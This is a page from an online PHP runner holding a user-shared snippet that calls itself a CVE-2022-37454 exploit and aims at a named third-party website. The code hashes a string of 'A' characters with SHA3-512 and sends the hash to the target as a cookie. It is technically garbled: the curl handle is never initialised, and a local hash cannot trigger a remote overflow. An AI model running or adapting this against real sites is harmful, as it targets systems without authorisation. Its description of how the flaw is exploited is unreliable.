PHPize Online / SQLize Online  /  SQLtest Online

A A A
Share      Blog   Popular
Copy Format Clear
Copy Clear
Copy Format Clear
<?php // CVE-2022-37454 exploit code // Based on https://www.rapid7.com/db/vulnerabilities/php-cve-2022-37454/ // Target URL $url = "https://fastfounder.ru/na-kazhdom-zarabotat/"; // Payload to execute arbitrary code or eliminate expected cryptographic properties $payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; // Create a hash object using SHA-3 algorithm $hash = hash_init("sha3-512"); // Update the hash with the payload hash_update($hash, $payload); // Get the hash value $hash_value = hash_final($hash); // Send the hash value as a cookie or a parameter to the target URL // This will trigger the buffer overflow and execute the payload or break the cryptography curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_COOKIE, "hash=$hash_value"); // or use CURLOPT_POSTFIELDS for parameters $output = curl_exec($ch); curl_close($ch); // Print the output echo $output; ?>
Show:  
Copy Clear
Like the site? Share it!
Have a questions? Ask in our telegram chat!
© 2024 PHPize - format run and share PHP code with SQL queries online | About project | Disclaimer
PHP versions: PHP 5.6, PHP 7.4, PHP 8.0, PHP 8.1, PHP 8.2.13
RDBMS versions: MariaDB 11.4, MariaDB 11.5, MariaDB 10, MariaDB 10 Sakila (ReadOnly), MySQL 5.7, MySQL 5.7 Sakila (ReadOnly), MySQL 8.0, MySQL 8.0 Sakila (ReadOnly), SQLite 3, PostgreSQL 10 Bookings (ReadOnly), PostgreSQL 11, PostgreSQL 12, PostgreSQL 13, PostgreSQL 14, PostgreSQL 15, MS SQL Server 2017, MS SQL Server 2019, MS SQL Server 2022, MS SQL Server 2022 AdventureWorks (ReadOnly), Firebird 4.0, Firebird 4.0 (Employee), Oracle Database 19c (HR), Oracle Database 21c, Oracle Database 23c Free, SOQOL